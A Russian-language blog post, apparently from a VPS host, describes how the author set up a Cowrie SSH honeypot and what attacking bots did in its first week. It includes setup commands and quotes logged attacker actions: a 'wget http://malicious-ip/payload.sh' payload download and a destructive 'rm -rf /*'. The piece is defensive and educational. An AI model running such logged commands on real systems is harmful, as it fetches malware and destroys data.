В один из вечеров, когда я проверяла логи на своём VPS, я заметила странную активность: десятки попыток входа по SSH с разных IP. Это был не targeted-атак, а обычный background noise интернета — боты сканируют IP в поисках открытых дверей. Тогда я решила: “А почему бы не посмотреть, что они вообще делают, если им дать иллюзию доступа?” И так началась моя история с honeypot-сервером на VPS.
Что такое honeypot и зачем он нужен?
Honeypot (ханипот) — это специальный сервер или сервис, который имитирует уязвимую систему, чтобы привлечь злоумышленников. Это как ловушка, которая вместо того, чтобы прятаться, наоборот — говорит: “Эй, зайди, здесь открыто”. Цель — не допустить атакующего в настоящую инфраструктуру, а наблюдать, как он себя поведёт, какие команды вводит, что ищет, какие эксплойты применяет.
Honeypot это не только для фана. Он может:
- Помочь выявить типичные методы атаки
- Собрать данные для защиты основной инфраструктуры
- Повысить навыки анализа инцидентов
- В ряде случаев — отпугнуть неопытных злоумышленников
Почему я выбрала VPS для honeypot
Настройка honeypot на домашнем сервере — занятие интересное, но ограниченное: IP не всегда белый, провайдер может заблокировать порт 22. А вот VPS — идеальный кандидат:
- Статичный белый IP
- Полный root-доступ
- Можно легко изолировать сервер от продакшена
- Стоит недорого (особенно если взять самый простой VDS, например, как у Timeweb или CloudVPS)
Выбор инструмента: Cowrie или T-Pot?
Для начала я рассматривала разные варианты honeypot’ов. Самые популярные на сегодня:
| Honeypot | Что имитирует | Сложность установки | Особенности |
|---|---|---|---|
| Cowrie | SSH, Telnet | Средняя | Собирает команды, IP, даже имена файлов |
| T-Pot | Множественные протоколы | Высокая | Готовый стек honeypot’ов, красивая визуализация |
| Kippo (устарел) | SSH | Низкая | Предшественник Cowrie |
| Honeyd | Сетевой трафик | Сложная | Эмуляция разных ОС, на уровне TCP/IP |
Я остановилась на Cowrie, потому что он прост, работает на Python, легко логирует всё в текст, и его легко обновлять. А главное — идеально подходит для SSH honeypot.
Установка Cowrie honeypot на VPS: пошагово
1. Настроить изолированную среду
Я создала новый VPS (на Ubuntu 22.04), отключила все ненужные порты, кроме 22, и… перенесла реальный SSH на порт 2222:
sudo nano /etc/ssh/sshd_config # Меняем: Port 2222 sudo systemctl restart ssh
Теперь порт 22 свободен — туда и посадим ловушку.
2. Установка зависимостей:
sudo apt update sudo apt install git python3-venv libssl-dev libffi-dev build-essential libpython3-dev -y
3. Клонирование Cowrie:
git clone https://github.com/cowrie/cowrie.git cd cowrie python3 -m venv cowrie-env source cowrie-env/bin/activate pip install --upgrade pip pip install -r requirements.txt
4. Настройка и запуск:
cp etc/cowrie.cfg.dist etc/cowrie.cfg # В конфиге можно изменить фейковые логины/пароли, логирование и т.д. bin/cowrie start
Что я узнала за первую неделю
Через сутки после запуска honeypot начал собирать логины:
- admin / admin
- root / toor
- user / 123456
Боты пытались установить майнеры, качать скрипты с Pastebin, делать
curlwgetrm -rf /*Как логируются команды
Cowrie записывает всё в
var/log/cowrie- — общие события
cowrie.log - — эмуляция терминала (прямо как видеозапись)
tty/ - — файлы, которые пытались загрузить
downloads/
Вот пример команды злоумышленника:
2025-08-14T21:53:12+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotSSHTransport,521,10.9.6.22] CMD: wget http://malicious-ip/payload.sh
Безопасность honeypot-сервера
Чтобы honeypot не стал сам жертвой:
- Я установила и разрешила только порты 22, 2222
iptables - Отключила исходящие соединения через
ufw deny out - Настроила ежедневную очистку логов через
logrotate - В случае взлома — VPS можно просто пересоздать
Можно ли ловить DDoS или ботнеты?
На мой взгляд — не стоит пытаться перехватить ботнеты или вмешиваться в работу атакующих. Honeypot — это наблюдательный инструмент, а не платформа для “контратак”. Лучше просто сохранять информацию, изучать поведение и повышать защиту.
Итого: стоит ли запускать honeypot на VPS?
Если вы интересуетесь безопасностью, хотите научиться анализировать атаки, работать с логами и понять, как выглядят “черные” сканеры интернета — да, стоит. Это дешево, увлекательно и очень познавательно.
Забирай бонус
Миграция бесплатна, а за оплату года — ещё месяц сверху.